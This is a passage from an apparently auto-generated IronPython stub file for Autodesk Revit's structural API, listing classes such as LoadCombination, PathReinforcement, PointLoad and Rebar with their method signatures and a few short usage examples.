object(), lambda self, v: None, lambda self: None) # default """The state of the load combination. Get: State(self: LoadCombination) -> LoadCombinationState Set: State(self: LoadCombination) = value """ Type = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The type of the load combination. Get: Type(self: LoadCombination) -> LoadCombinationType Set: Type(self: LoadCombination) = value """ class LoadCombinationState(Enum, IComparable, IFormattable, IConvertible): """ Specifies load combination state. 
enum LoadCombinationState, values: Serviceability (0), Ultimate (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Serviceability = None Ultimate = None value__ = None class LoadCombinationType(Enum, IComparable, IFormattable, IConvertible): """ Specifies load combination type. enum LoadCombinationType, values: Combination (0), Envelope (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Combination = None Envelope = None value__ = None class LoadComponent(object, IDisposable): """ An object that represents a load combination component. LoadComponent(loadCaseOrCombinationId: ElementId, factor: float) """ def Dispose(self): """ Dispose(self: LoadComponent) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: LoadComponent, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, loadCaseOrCombinationId, factor): """ __new__(cls: type, loadCaseOrCombinationId: ElementId, factor: float) """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Factor = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Load component factor. 
Get: Factor(self: LoadComponent) -> float Set: Factor(self: LoadComponent) = value """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: LoadComponent) -> bool """ LoadCaseOrCombinationId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Load case or combination id. Get: LoadCaseOrCombinationId(self: LoadComponent) -> ElementId Set: LoadCaseOrCombinationId(self: LoadComponent) = value """ class LoadNature(Element, IDisposable): """ An object that represents a load nature. """ @staticmethod def Create(document, name): """ Create(document: Document, name: str) -> LoadNature Creates a new LoadNature. document: The Document to which new load nature element will be added. name: The name of the load nature. Returns: The newly created load nature element if successful, ll otherwise. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class LoadNatureCategory(Enum, IComparable, IFormattable, IConvertible): """ Specifies load case nature. enum LoadNatureCategory, values: Accidental (5), Dead (0), Live (1), RoofLive (4), Seismic (7), Snow (3), Temperature (6), Wind (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Accidental = None Dead = None Live = None RoofLive = None Seismic = None Snow = None Temperature = None value__ = None Wind = None class LoadOrientTo(Enum, IComparable, IFormattable, IConvertible): """ Specifies load orientation. 
enum LoadOrientTo, values: HostLocalCoordinateSystem (2), Project (0), WorkPlane (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass HostLocalCoordinateSystem = None Project = None value__ = None WorkPlane = None class LoadType(Enum, IComparable, IFormattable, IConvertible): """ This enum declares types of Loads. enum LoadType, values: Area (2), Line (1), Point (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Area = None Line = None Point = None value__ = None class LoadUsage(Element, IDisposable): """ An object that represents a load usage. """ @staticmethod def Create(document, name): """ Create(document: Document, name: str) -> LoadUsage Creates a new LoadUsage. document: The Document to which new load usage element will be added. name: The name of the load usage. Returns: The newly created load usage element if successful, ll otherwise. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass class MemberForces(object, IDisposable): """ An object that represents a member forces on analytical model element. MemberForces(start: bool, force: XYZ, moment: XYZ) """ def Dispose(self): """ Dispose(self: MemberForces) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: MemberForces, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, start, force, moment): """ __new__(cls: type, start: bool, force: XYZ, moment: XYZ) """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Force = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The translational forces at relative point position of the element. Get: Force(self: MemberForces) -> XYZ Set: Force(self: MemberForces) = value """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: MemberForces) -> bool """ Moment = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The rotational forces at relative point position of the element. Get: Moment(self: MemberForces) -> XYZ Set: Moment(self: MemberForces) = value """ Start = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Member Forces position on analytical model stick element. True for start, false for end. Get: Start(self: MemberForces) -> bool Set: Start(self: MemberForces) = value """ class MemberForcesServiceData(object, IDisposable): """ The data needed by member forces server to perform type definition. MemberForcesServiceData(document: Document, currentElementIds: IList[ElementId]) """ def Dispose(self): """ Dispose(self: MemberForcesServiceData) """ pass def GetCurrentElements(self): """ GetCurrentElements(self: MemberForcesServiceData) -> IList[ElementId] Returns the list of Ids of the current elements. Returns: Ids of the current elements. Contains the family base element to which the Member Forces parameters belongs. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: MemberForcesServiceData, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, document, currentElementIds): """ __new__(cls: type, document: Document, currentElementIds: IList[ElementId]) """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Document = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The current document. Get: Document(self: MemberForcesServiceData) -> Document """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: MemberForcesServiceData) -> bool """ class MultiplanarOption(Enum, IComparable, IFormattable, IConvertible): """ Input argument type for Rebar.GetCenterlineCurves method. Controls whether all curves of a multi-planar Rebar element are returned by GetCenterlineCurves, or only the curves in the primary plane. enum MultiplanarOption, values: IncludeAllMultiplanarCurves (0), IncludeOnlyPlanarCurves (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass IncludeAllMultiplanarCurves = None IncludeOnlyPlanarCurves = None value__ = None class PathReinforcement(Element, IDisposable): """ An object that represents an Path Reinforcement within the Autodesk Revit project. """ @staticmethod def Create(document, hostElement, curveArray, flip, pathReinforcementTypeId, rebarBarTypeId, startRebarHookTypeId, endRebarHookTypeId, rebarShapeId=None): """ Create(document: Document, hostElement: Element, curveArray: IList[Curve], flip: bool, pathReinforcementTypeId: ElementId, rebarBarTypeId: ElementId, startRebarHookTypeId: ElementId, endRebarHookTypeId: ElementId) -> PathReinforcement Create(document: Document, hostElement: Element, curveArray: IList[Curve], flip: bool, pathReinforcementTypeId: ElementId, rebarBarTypeId: ElementId, startRebarHookTypeId: ElementId, endRebarHookTypeId: ElementId, rebarShapeId: ElementId) -> PathReinforcement """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCurveElementIds(self): """ GetCurveElementIds(self: PathReinforcement) -> IList[ElementId] Retrieves the set of ElementIds of curves forming the boundary of the Path Reinforcement. Returns: A collection of ElementIds of ModelCurve elements. """ pass def GetHostId(self): """ GetHostId(self: PathReinforcement) -> ElementId The element that contains the Path Reinforcement. 
Returns: The element that the Path Reinforcement object belongs to, such as a structural wall, floor or foundation. """ pass @staticmethod def GetOrCreateDefaultRebarShape(document, rebarBarTypeId, startRebarHookTypeId, endRebarHookTypeId): """ GetOrCreateDefaultRebarShape(document: Document, rebarBarTypeId: ElementId, startRebarHookTypeId: ElementId, endRebarHookTypeId: ElementId) -> ElementId Creates a new RebarShape object with a default name or returns existing one which fulfills Path Reinforcement bending data requirements. document: The document. rebarBarTypeId: The id of the RebarBarType. startRebarHookTypeId: The id of the RebarHookType for the start of the bar. If this parameter is InvalidElementId, it means to create a rebar with no start hook. endRebarHookTypeId: The id of the RebarHookType for the end of the bar. If this parameter is InvalidElementId, it means to create a rebar with no end hook. Returns: Rebar Shape id. """ pass def GetRebarInSystemIds(self): """ GetRebarInSystemIds(self: PathReinforcement) -> IList[ElementId] Returns the ids of the RebarInSystem elements owned by the PathReinforcement element. """ pass def IsAlternatingLayerEnabled(self): """ IsAlternatingLayerEnabled(self: PathReinforcement) -> bool Checks if alternating bars are present in Path Reinforcement. Returns: True if the alternating bars exist in Path Reinforcement instance. """ pass def IsSolidInView(self, view): """ IsSolidInView(self: PathReinforcement, view: View3D) -> bool Checks if this Path Reinforcement is shown solidly in a 3D view. view: The 3D view element Returns: True if Path Reinforcement is shown solidly, false otherwise. """ pass def IsUnobscuredInView(self, view): """ IsUnobscuredInView(self: PathReinforcement, view: View) -> bool Checks if Path Reinforcement is shown unobscured in a view. view: The view element Returns: True if Path Reinforcement is shown unobscured, false otherwise. """ pass def IsValidAlternatingBarOrientation(self, orientation): """ IsValidAlternatingBarOrientation(self: PathReinforcement, orientation: ReinforcementBarOrientation) -> bool Checks if orientation for alternating bars is valid. orientation: An orientation. Returns: True if orientation for alternating bars are valid. """ pass def IsValidPrimaryBarOrientation(self, orientation): """ IsValidPrimaryBarOrientation(self: PathReinforcement, orientation: ReinforcementBarOrientation) -> bool Checks if orientation for primary bars is valid. orientation: An orientation. Returns: True if orientation for primary bars are valid. """ pass @staticmethod def IsValidRebarShapeId(aDoc, elementId): """ IsValidRebarShapeId(aDoc: Document, elementId: ElementId) -> bool Identifies whether an element id corresponds to a Rebar Shape element which can be used in Path Reinforcement. aDoc: The document. elementId: An element id. Returns: True if the specified element id corresponds to a Rebar Shape element. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass @staticmethod def RemovePathReinforcementSystem(doc, system): """ RemovePathReinforcementSystem(doc: Document, system: PathReinforcement) -> IList[ElementId] Deletes the specified PathReinforcement, and converts its RebarInSystem elements to equivalent Rebar elements. doc: The document. system: A PathReinforcement element in the document. Returns: The ids of the newly created Rebar elements. 
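Example (an illustrative usage sketch, not generated from the assembly; it assumes the script runs inside Revit, e.g. via pyRevit or RevitPythonShell, that doc is the active Document, and that path_reinf is an existing PathReinforcement element; these are placeholder names):

    from Autodesk.Revit.DB import Transaction
    from Autodesk.Revit.DB.Structure import PathReinforcement

    t = Transaction(doc, 'Convert path reinforcement to rebar')
    t.Start()
    # Deletes the PathReinforcement and converts its RebarInSystem members
    # to free-standing Rebar elements, returning the new element ids.
    new_rebar_ids = PathReinforcement.RemovePathReinforcementSystem(doc, path_reinf)
    t.Commit()
    print('Created %d rebar elements' % new_rebar_ids.Count)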
""" pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetSolidInView(self, view, solid): """ SetSolidInView(self: PathReinforcement, view: View3D, solid: bool) Sets this Path Reinforcement to be shown solidly in a 3D view. view: The 3D view element solid: True if Path Reinforcement is shown solidly, false otherwise. """ pass def SetUnobscuredInView(self, view, unobscured): """ SetUnobscuredInView(self: PathReinforcement, view: View, unobscured: bool) Sets Path Reinforcement to be shown unobscured in a view. view: The view element unobscured: True if Path Reinforcement is shown unobscured, false otherwise. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass AdditionalOffset = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Additional offset of rebars in the Path Reinforcement. Get: AdditionalOffset(self: PathReinforcement) -> float Set: AdditionalOffset(self: PathReinforcement) = value """ AlternatingBarOrientation = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Orientation of alternating bars of Path Reinforcement. Get: AlternatingBarOrientation(self: PathReinforcement) -> ReinforcementBarOrientation Set: AlternatingBarOrientation(self: PathReinforcement) = value """ AlternatingBarShapeId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The RebarShape element that defines the shape of the alternating bars of the Path Reinforcement. Get: AlternatingBarShapeId(self: PathReinforcement) -> ElementId Set: AlternatingBarShapeId(self: PathReinforcement) = value """ PathReinforcementType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Retrieves the type of the Path Reinforcement. Get: PathReinforcementType(self: PathReinforcement) -> PathReinforcementType """ PrimaryBarOrientation = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Orientation of primary bars of Path Reinforcement. Get: PrimaryBarOrientation(self: PathReinforcement) -> ReinforcementBarOrientation Set: PrimaryBarOrientation(self: PathReinforcement) = value """ PrimaryBarShapeId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The RebarShape element that defines the shape of the primary bars of the Path Reinforcement. Get: PrimaryBarShapeId(self: PathReinforcement) -> ElementId Set: PrimaryBarShapeId(self: PathReinforcement) = value """ class PathReinforcementType(ElementType, IDisposable): """ An object that specifies the type of a Structural Path Reinforcement element in Autodesk Revit. """ @staticmethod def CreateDefaultPathReinforcementType(ADoc): """ CreateDefaultPathReinforcementType(ADoc: Document) -> ElementId Creates a new PathReinforcementType object with a default name. ADoc: The document. Returns: The newly created type id. 
""" pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class PathReinSpanSymbol(IndependentTag, IDisposable): """ Represents a Path Reinforcement Span Symbol element in Autodesk Revit. """ @staticmethod def Create(document, viewId, hostId, point, symbolId): """ Create(document: Document, viewId: ElementId, hostId: LinkElementId, point: XYZ, symbolId: ElementId) -> PathReinSpanSymbol Creates a new instance of PathReinSpanSymbol in the project. document: The document. viewId: The id of the view in which the symbol should appear. hostId: The ElementId of PathReinforcement (either in the document, or linked from another document). point: The span symbol's head position. symbolId: The family symbol id of this element. Returns: A reference to newly created span symbol. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class PointLoad(LoadBase, IDisposable): """ An object that represents a force/moment applied to a single point. """ @staticmethod def Create(aDoc, *__args): """ Create(aDoc: Document, host: AnalyticalModelStick, selector: AnalyticalElementSelector, forceVector: XYZ, momentVector: XYZ, symbol: PointLoadType) -> PointLoad Creates a new hosted point load within the project. aDoc: Document to which new point load will be added. host: The AnalyticalModelStick (Analytical Beam, Analytical Brace, Analytical Column) host element for the point Load. selector: The start or end point of the Analytical stick element. forceVector: The applied 3d force vector. momentVector: The applied 3d moment vector. symbol: The symbol of the PointLoad. Set ll to use default type. 
Returns: If successful, returns the newly created PointLoad, ll otherwise. Create(aDoc: Document, host: AnalyticalModel, forceVector: XYZ, momentVector: XYZ, symbol: PointLoadType) -> PointLoad Creates a new hosted point load within the project. aDoc: Document to which new point load will be added. host: The Analytical Isolated Foundation type host element for the point Load. forceVector: The applied 3d force vector. momentVector: The applied 3d moment vector. symbol: The symbol of the PointLoad. Set ll to use default type. Returns: If successful, returns the newly created PointLoad, ll otherwise. Create(aDoc: Document, point: XYZ, forceVector: XYZ, momentVector: XYZ, symbol: PointLoadType, plane: SketchPlane) -> PointLoad Creates a new non-hosted point load within the project using data at point. aDoc: Document to which new point load will be added. point: The position of point load, measured in decimal feet. forceVector: The applied 3d force vector. momentVector: The applied 3d moment vector. symbol: The symbol of the PointLoad. Set ll to use default type. plane: The work plane of the PointLoad. Set ll to use default plane. Returns: If successful, returns the newly created PointLoad, ll otherwise. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass ForceVector = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The force vector applied to the point load, oriented according to OrientTo setting. Get: ForceVector(self: PointLoad) -> XYZ Set: ForceVector(self: PointLoad) = value """ MomentVector = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The moment vector applied to the point load, oriented according to OrientTo setting. Get: MomentVector(self: PointLoad) -> XYZ Set: MomentVector(self: PointLoad) = value """ Point = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Returns the position of point load, measured in decimal feet. Get: Point(self: PointLoad) -> XYZ Set: Point(self: PointLoad) = value """ class PointLoadType(LoadTypeBase, IDisposable): """ An object that represents a Load type. 
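Example (an illustrative sketch for the PointLoad.Create overloads documented above, not generated from the assembly; doc is assumed to be the active Document and a Transaction is assumed to be open):

    from Autodesk.Revit.DB import XYZ
    from Autodesk.Revit.DB.Structure import PointLoad

    force = XYZ(0, 0, -1000)   # force vector in Revit's internal units
    moment = XYZ(0, 0, 0)
    # Passing None for symbol and plane uses the default point load type
    # and the default work plane (the null case described above).
    load = PointLoad.Create(doc, XYZ(10, 0, 0), force, moment, None, None)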
""" def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class Rebar(Element, IDisposable): """ Represents a rebar element in Autodesk Revit. """ def CanApplyPresentationMode(self, dBView): """ CanApplyPresentationMode(self: Rebar, dBView: View) -> bool Checks if a presentation mode can be applied for this rebar in the given view. dBView: The view in which presentation mode will be applied. Returns: True if presentation mode can be applied for this view, false otherwise. """ pass def CanSuppressFirstOrLastBar(self, dBView, end): """ CanSuppressFirstOrLastBar(self: Rebar, dBView: View, end: int) -> bool Checks if the first or last bar in rebar set can be hidden in the given view. dBView: The view in which presentation mode will be applied. end: 0 for the first bar in rebar set, 1 for the last bar. Returns: True the first or last bar in rebar set can be hidden for this view, false otherwise. """ pass def CanUseHookType(self, proposedHookId): """ CanUseHookType(self: Rebar, proposedHookId: ElementId) -> bool Checks if the specified RebarHookType id is of a valid RebarHookType for the Rebar's RebarBarType proposedHookId: The Id of the RebarHookType Returns: Returns true if the id is of a valid RebarHookType for the Rebar element. """ pass def ClearPresentationMode(self, dBView): """ ClearPresentationMode(self: Rebar, dBView: View) Sets the presentation mode for this rebar set to the default (either for a single view, or for all views). dBView: The view where the presentation mode will be cleared. NULL for all views """ pass def ComputeDrivingCurves(self): """ ComputeDrivingCurves(self: Rebar) -> IList[Curve] Compute the driving curves. Returns: Returns an empty array if an error is encountered. """ pass def ConstraintsCanBeEdited(self): """ ConstraintsCanBeEdited(self: Rebar) -> bool Returns true, if the Rebar element's external constraints are available for editing using the RebarConstraintsManager class. Examples of where this method would return false are: Rebar in Groups (which do not have constraints), or legacy, sketch-based Rebar elements created before the introduction of RebarShape families in version 2009. 
""" pass @staticmethod def ContainsValidArcRadiiForStyleAndBarType(curves, style, barType): """ ContainsValidArcRadiiForStyleAndBarType(curves: IList[Curve], style: RebarStyle, barType: RebarBarType) -> bool """ pass @staticmethod def CreateFromCurves(doc, style, barType, startHook, endHook, host, norm, curves, startHookOrient, endHookOrient, useExistingShapeIfPossible, createNewShape): """ CreateFromCurves(doc: Document, style: RebarStyle, barType: RebarBarType, startHook: RebarHookType, endHook: RebarHookType, host: Element, norm: XYZ, curves: IList[Curve], startHookOrient: RebarHookOrientation, endHookOrient: RebarHookOrientation, useExistingShapeIfPossible: bool, createNewShape: bool) -> Rebar """ pass @staticmethod def CreateFromCurvesAndShape(doc, rebarShape, barType, startHook, endHook, host, norm, curves, startHookOrient, endHookOrient): """ CreateFromCurvesAndShape(doc: Document, rebarShape: RebarShape, barType: RebarBarType, startHook: RebarHookType, endHook: RebarHookType, host: Element, norm: XYZ, curves: IList[Curve], startHookOrient: RebarHookOrientation, endHookOrient: RebarHookOrientation) -> Rebar """ pass @staticmethod def CreateFromRebarShape(doc, rebarShape, barType, host, origin, xVec, yVec): """ CreateFromRebarShape(doc: Document, rebarShape: RebarShape, barType: RebarBarType, host: Element, origin: XYZ, xVec: XYZ, yVec: XYZ) -> Rebar Creates a new Rebar, as an instance of a RebarShape. The instance will 